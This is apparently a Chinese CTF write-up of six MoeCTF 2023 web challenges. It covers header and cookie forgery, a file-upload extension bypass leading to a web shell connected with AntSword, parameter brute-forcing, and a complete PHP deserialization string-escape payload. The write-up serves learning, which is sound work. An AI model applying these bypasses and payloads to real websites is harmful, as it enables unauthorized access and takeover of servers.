[MoeCTF 2023] web题解
文章目录
- web
-
- http
- cookie
- 彼岸的flag
- moe图床
- 大海捞针
- 夺命十三枪
web
http
连接到本地后,题目给了我们任务
![[MoeCTF 2023] web题解_第1张图片](http://img.e-com-net.com/image/info8/f5db7bc8fe9b44e391069f95416d70ed.jpg)
- 第一个是要求我们GET传参
UwU=u - 第二个是要求我们POST传参
Luv=u - 第三个是要求我们cookie值为
admin - 第四个是要求我们来自
127.0.0.1 - 第五个是要求我们用
MoeBrowser浏览器
在此之前先要学会用bp抓本地包
我们win+R打开cmd,然后输入
ipconfig
将下面的ip复制,把题目的localhost改掉,即可抓本地包
![[MoeCTF 2023] web题解_第2张图片](http://img.e-com-net.com/image/info8/556d7f3c1387420fa1cec3ab5c8a4d7d.jpg)
bp抓包,添加我们的参数,得到flag
![[MoeCTF 2023] web题解_第3张图片](http://img.e-com-net.com/image/info8/9641079d4b664d63b975dde8f9a96e7a.jpg)
cookie
打开题目,按照给的提示
我们先到./register,POST传参json数据
{
"username":"dog",
"password":"123456"
}
![[MoeCTF 2023] web题解_第4张图片](http://img.e-com-net.com/image/info8/274c2fb1b1ab483b9125d5fbd2652de4.jpg)
然后再到./login登陆一下
{
"username":"dog",
"password":"123456"
}
![[MoeCTF 2023] web题解_第5张图片](http://img.e-com-net.com/image/info8/2744eae7402349f58632f266fb32d712.jpg)
查看./flag,结果不行
![[MoeCTF 2023] web题解_第6张图片](http://img.e-com-net.com/image/info8/356d8c405b144dba804b70fbdd748c53.jpg)
尝试注册admin用户发现已存在,结合提示可以修改cookie值
抓包./status,将token解码发现是加密过的
![[MoeCTF 2023] web题解_第7张图片](http://img.e-com-net.com/image/info8/1331d0f404f94f8d9f52900238a6f938.jpg)
我们修改一下role为admin,再次编码,尝试在./status替换原来的token
然后访问./flag发现还是不行,于是直接访问./flag抓包修改cookie值
得到flag
![[MoeCTF 2023] web题解_第8张图片](http://img.e-com-net.com/image/info8/14a88d4f34c44d359f800771f320ee70.jpg)
彼岸的flag
打开题目(F12发现巨佬博客,原来是web前端知识)
发现有问题
![[MoeCTF 2023] web题解_第9张图片](http://img.e-com-net.com/image/info8/6cf131af63034c00ade63bb1f4642925.jpg)
直接选取元素,得到flag
![[MoeCTF 2023] web题解_第10张图片](http://img.e-com-net.com/image/info8/7ca31355b63c4cc9859c3952d926d7fa.jpg)
moe图床
文件上传类型的题目
然后F12发现只允许上传png格式
if (!file){
alert('请选择一个文件进行上传!');
return;
}
const allowedExtensions = ['png'];
const fileExtension = file.name.split('.').pop().toLowerCase();
if (!allowedExtensions.includes(fileExtension)) {
alert('只允许上传后缀名为png的文件!');
return;
}
分析一下
const allowedExtensions = ['png'];
定义了一个名为 allowedExtensions 的数组,其中包含允许上传的文件扩展名。在这个例子中,只允许上传扩展名为 ‘png’ 的文件。
const fileExtension = file.name.split('.').pop().toLowerCase();
从 file 对象中提取文件扩展名。它使用 split() 方法根据点 (.) 分隔符将文件名拆分为数组,并使用 pop() 获取结果数组的最后一个元素,该元素表示文件扩展名。toLowerCase() 方法将文件扩展名转换为小写,以进行大小写不敏感的比较。
这样看只需要我们上传的文件名里面包含png的拓展名即可绕过
前提,我们还只能上传png绕过js前端检测
我们创建1.png
然后bp抓包修改文件名为1.png.php,上传成功
![[MoeCTF 2023] web题解_第11张图片](http://img.e-com-net.com/image/info8/76cfa0b6766045149715e7c80177ee36.jpg)
然后蚁剑连接
![[MoeCTF 2023] web题解_第12张图片](http://img.e-com-net.com/image/info8/02b95c44288146d4a9de6d2584544c17.jpg)
得到flag
![[MoeCTF 2023] web题解_第13张图片](http://img.e-com-net.com/image/info8/cca6c0ba13d142efaed3390e0b604403.jpg)
大海捞针
打开题目,给了提示
![[MoeCTF 2023] web题解_第14张图片](http://img.e-com-net.com/image/info8/d7bce3dfc68143f297dc360a3c11f09b.jpg)
应该说的是GET传参id可以连接到不同宇宙,id的值从1到1000
一个个找太麻烦了,结合提示
![[MoeCTF 2023] web题解_第15张图片](http://img.e-com-net.com/image/info8/9793c3a55401476aa8e162e17a22a7eb.jpg)
应该是要爆破
我们直接bp抓包丢到instruder,添加payload位置
![[MoeCTF 2023] web题解_第16张图片](http://img.e-com-net.com/image/info8/70ae95acd6cc40eaa734e1d91fbc77e6.jpg)
设置payload集为从1到1000
![[MoeCTF 2023] web题解_第17张图片](http://img.e-com-net.com/image/info8/28c3335d3cd54c70a7c5751eecd5826a.jpg)
开始爆破,发现?id=676的长度最特殊,猜测有flag
![[MoeCTF 2023] web题解_第18张图片](http://img.e-com-net.com/image/info8/b0618a85eec244629b46d4ee11a616b9.jpg)
我们直接访问,发现是另外一道题彼岸的flag出现过的
直接查看页面源代码,搜索一下得到flag
![[MoeCTF 2023] web题解_第19张图片](http://img.e-com-net.com/image/info8/c1aef4a9da3a4965a21946e30610a287.jpg)
夺命十三枪
源代码
';
try{
echo unserialize($after);
}catch (Exception $e) {
echo "Even Caused A Glitch...";
}
?>
Your Movements: O:34:"Omg_It_Is_So_Cool_Bring_Me_My_Flag":2:{s:5:"Chant";s:4:"test";s:11:"Spear_Owner";s:6:"Nobody";}
Far away from COOL...
我们再看下Hanxin.exe.php
"Lovesickness",
"di_er_qiang" => "Heartbreak",
"di_san_qiang" => "Blind_Dragon",
"di_si_qiang" => "Romantic_charm",
"di_wu_qiang" => "Peerless",
"di_liu_qiang" => "White_Dragon",
"di_qi_qiang" => "Penetrating_Gaze",
"di_ba_qiang" => "Kunpeng",
"di_jiu_qiang" => "Night_Parade_of_a_Hundred_Ghosts",
"di_shi_qiang" => "Overlord",
"di_shi_yi_qiang" => "Letting_Go",
"di_shi_er_qiang" => "Decisive_Victory",
"di_shi_san_qiang" => "Unrepentant_Lethality"
);
public static function Make_a_Move($move){
foreach(self::$Top_Secret_Long_Spear_Techniques_Manual as $index => $movement){
$move = str_replace($index, $movement, $move);
}
return $move;
}
}
class Omg_It_Is_So_Cool_Bring_Me_My_Flag{
public $Chant = '';
public $Spear_Owner = 'Nobody';
function __construct($chant){
$this->Chant = $chant;
$this->Spear_Owner = 'Nobody';
}
function __toString(){
if($this->Spear_Owner !== 'MaoLei'){
return 'Far away from COOL...';
}
else{
return "Omg You're So COOOOOL!!! " . getenv('FLAG');
}
}
}
?>
分析一下
- 我们先看到出口
Omg_It_Is_So_Cool_Bring_Me_My_Flag.__toString(),只要满足Spear_Owner为MaoLei就可得到flag - 往前推,当使用echo或者print输出对象时会调用此方法,源代码的
echo 'Your Movements: ' . $after . '刚好满足
';
但是我们实例化Omg_It_Is_So_Cool_Bring_Me_My_Flag()后,可以发现Spear_Owner的值我们是修改不了的。这就是个问题,我们怎么做到修改一个不可被修改的值呢
关键点在于Deadly_Thirteen_Spears.Make_a_Move(),同时结合我们的目的,我们可以利用字符串逃逸来实现绕过
我们先随便传入test
![[MoeCTF 2023] web题解_第20张图片](http://img.e-com-net.com/image/info8/b01da0b4edec4bb694fb3db923e286d5.jpg)
我们的目标是
O:34:"Omg_It_Is_So_Cool_Bring_Me_My_Flag":2:{s:5:"Chant";s:4:"test";s:11:"Spear_Owner";s:6:"MaoLei";}
我们尝试把";s:11:"Spear_Owner";s:6:"MaoLei";}写到Chant里面,然后把后面的部分挤掉
同时长度变为4+35
O:34:"Omg_It_Is_So_Cool_Bring_Me_My_Flag":2:{s:5:"Chant";s:39:"test";s:11:"Spear_Owner";s:6:"MaoLei";}";s:11:"Spear_Owner";s:6:"Nobody";}
这时候我们利用替换前后长度差与之相等
这里我选的是构造7*(di_qi_qiang),因为当它被替换后长度差为5,5*7刚好为我们要的
只要做到下面这样就可以得到flag,长度为39+35
O:34:"Omg_It_Is_So_Cool_Bring_Me_My_Flag":2:{s:5:"Chant";s:74:"di_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiang";s:11:"Spear_Owner";s:6:"MaoLei";}";s:11:"Spear_Owner";s:6:"Nobody";}
所以payload为
?chant=di_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiang";s:11:"Spear_Owner";s:6:"MaoLei";}
得到flag
![[MoeCTF 2023] web题解_第21张图片](http://img.e-com-net.com/image/info8/46bab2cf3bc941c3aadce2bf80f1b21b.jpg)